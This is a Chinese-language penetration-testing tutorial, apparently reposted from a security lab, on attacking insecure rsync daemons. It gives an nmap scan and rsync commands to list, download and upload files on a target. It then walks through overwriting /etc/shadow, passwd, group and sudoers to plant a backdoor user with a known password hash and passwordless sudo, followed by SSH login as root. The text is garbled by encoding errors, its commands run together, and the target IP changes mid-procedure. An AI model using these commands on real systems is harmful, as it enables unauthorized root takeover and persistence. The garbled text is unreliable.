????????本文將根據(jù)針對(duì)Linux操作系統(tǒng)上不安全的Rsync配置，淺談如何利用rsync服務(wù)進(jìn)行攻擊。

1、什么是RSYNC？

Rsync是用于在兩個(gè)服務(wù)器(通常是Linux)之間傳輸和同步文件的實(shí)用程序。它通過檢查文件大小和時(shí)間戳來(lái)確定同步。根據(jù)經(jīng)驗(yàn)發(fā)現(xiàn)，在進(jìn)行滲透測(cè)試期間，發(fā)現(xiàn)約有三分之一的服務(wù)器并沒有安全配置Rsync。然而，弱配置通常會(huì)導(dǎo)致服務(wù)器上的敏感數(shù)據(jù)未經(jīng)授權(quán)訪問，甚至還會(huì)讓攻擊者活動(dòng)webshell。

????????遠(yuǎn)程訪問通過Rsync共享的目錄需要兩件事，文件共享訪問和文件權(quán)限。

Rsync的配置方式如下：

??????? 1. 可以在/etc/Rsyncd.conf中定義“?文件共享訪問”，?以提供匿名或經(jīng)過身份驗(yàn)證的訪問。

?2.還可以通過定義rsync服務(wù)將以其身份運(yùn)行的用戶，在/etc/rsyncd.conf中定義文件訪問權(quán)限。如果將rsync配置為以root用戶身份運(yùn)行，則允許連接的任何人都可以使用root用戶的特權(quán)來(lái)訪問共享文件。

rsyncd.conf文件的示例，該文件允許匿名root用戶訪問整個(gè)文件系統(tǒng)：

motd file = /etc/Rsyncd.motdlock file = /var/run/Rsync.locklog file = /var/log/Rsyncd.logpid file = /var/run/Rsyncd.pid[files]path = /comment = Remote file share.uid = 0gid = 0read only = nolist = yes

2、對(duì)目標(biāo)站點(diǎn)進(jìn)行nmap掃描rsync服務(wù)

??????? rsync服務(wù)默認(rèn)在873端口監(jiān)聽。通過nmap發(fā)現(xiàn)開啟rsync服務(wù)

nmap 10.10.10.134

列舉目錄和文件

列舉目錄 rsync 10.10.10.134 列舉子目錄內(nèi)容 rsync 10.10.10.134::files 遞歸列出目錄和文件 rsync -r 10.10.10.134::files/tmp/ 下載文件夾 rsync -r 10.10.10.134::files/home/test/ 通過RSYNC上傳文件 使用Rsync上傳文件的命令。。 上傳文件 rsync ./myfile.txt 10.10.10.134::files/home/test 上載文件夾 rsync -r ./myfolder 10.10.10.134::files/home/test 通過Rsync創(chuàng)建新用戶

????????如果rsync配置為以root身份運(yùn)行并且可以匿名訪問，則可以通過直接修改shadow，passwd，group和sudoers文件來(lái)創(chuàng)建新的特權(quán)Linux用戶。

注意：相同的通用方法可用于提供對(duì)操作系統(tǒng)的完全寫入訪問權(quán)限的任何漏洞。其他一些示例包括NFS導(dǎo)出和上載以root用戶身份運(yùn)行的Web Shell。

通過rsync創(chuàng)建新用戶

????創(chuàng)建主目錄讓我們從創(chuàng)建新用戶的主目錄開始。

# Create local work directoriesmkdir demomkdir backupcd demo # Create new user’s home directorymkdir ./myuserrsync -r ./myuser 10.10.10.134::files/home

shadow文件

/etc /shadow文件是Linux密碼文件，其中包含用戶信息，例如主目錄和加密密碼。它只能由root訪問。

要通過rsync注入新的用戶，必須：

??? 1. 生成密碼。

??? 2. 下載/ etc / shadow。(備份)

????3.?將新用戶追加到/ etc /shadow的末尾

????4.?上傳/覆蓋現(xiàn)有的/ etc /shadow

????注意：確保創(chuàng)建系統(tǒng)上新用戶。?

創(chuàng)建加密密碼：

openssl passwd -crypt password123將新用戶條目添加到/ etc / shadow：rsync -R 10.10.10.134::files/etc/shadow .cp ./etc/shadow ../backupecho "myuser:MjHKz4C0Z0VCI:17861:0:99999:7:::" >> ./etc/shadowrsync?./etc/shadow?10.10.10.134::files/etc/

passwd文件

/ etc / passwd文件用于跟蹤有權(quán)訪問系統(tǒng)的注冊(cè)用戶。它不包含加密的密碼。所有用戶都可以閱讀。

要通過rsync注入新的用戶條目，您必須：

??? 1. 創(chuàng)建要注入的用戶條目。

??? 2. 下載/ etc / passwd。(并備份它，以便以后可以恢復(fù)狀態(tài))

??? 3. 將新用戶條目追加到passwd的末尾。

????4.?上傳/覆蓋現(xiàn)有的/ etc / passwd

注意：可以隨意更改為uid，但請(qǐng)確保它與/ etc / group文件中設(shè)置的值匹配。在這種情況下，UID / GUID為1021。

將新用戶條目添加到/ etc / passwd：rsync -R 10.10.10.134::files/etc/passwd .cp ./etc/passwd ../backupecho "myuser:x:1021:1021::/home/myuser:/bin/bash" >> ./etc/passwdrsync ./etc/passwd 10.10.10.134::files/etc/

將新用戶添加到用戶組當(dāng)中

/ etc / group文件用于跟蹤系統(tǒng)上已注冊(cè)的組信息。它不包含加密的密碼。所有用戶都可以閱讀。

要通過rsync注入新的用戶條目，您必須：

1. 創(chuàng)建要注入的用戶條目。

2. 下載/ etc / group。(和備份，以防萬(wàn)一)

3. 將新用戶條目追加到組末尾。

4. 上傳/覆蓋現(xiàn)有的/ etc / group文件。

注意：可以隨意更改為uid，但請(qǐng)確保它與/ etc / passwd文件中設(shè)置的值匹配。在這種情況下，UID / GUID為1021。將新用戶條目添加到/ etc / group：

rsync -R 10.10.10.134::files/etc/group .cp ./etc/group ../backupecho "myuser:x:1021:" >> ./etc/grouprsync ./etc/group 10.10.10.134::files/etc/

創(chuàng)建sudoers

文件目錄/ etc / sudoers文件包含允許使用sudo命令以root用戶身份運(yùn)行命令的用戶列表。它只能由root讀取。我們將對(duì)其進(jìn)行修改，以允許新用戶通過sudo執(zhí)行任何命令。

要通過rsync注入條目,前提條件：

??? 1. 創(chuàng)建要注入的用戶條目。

??? 2. 下載/ etc / sudoers。(和備份，以防萬(wàn)一)

??? 3. 將新用戶條目追加到sudoers的末尾。

??? 4. 上傳/覆蓋現(xiàn)有的/ etc / sudoers文件。

將新用戶條目添加到/ etc / sudoers：

rsync -R 10.10.10.134::files/etc/sudoers .cp ./etc/sudoers ../backupecho "myuser ALL=(ALL) NOPASSWD:ALL" >> ./etc/sudoers rsync ./etc/sudoers 192.168.1.171::files/etc/

然后，只需使用新創(chuàng)建的用戶通過SSH連接，執(zhí)行sudo root就完成了。

---

手握日月摘星辰，安全路上永不止步。

???????????????????????????????????????????????????- Khan攻防安全實(shí)驗(yàn)室

總結(jié)

以上是生活随笔為你收集整理的rsync命令_浅谈利用rsync服务的攻击的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。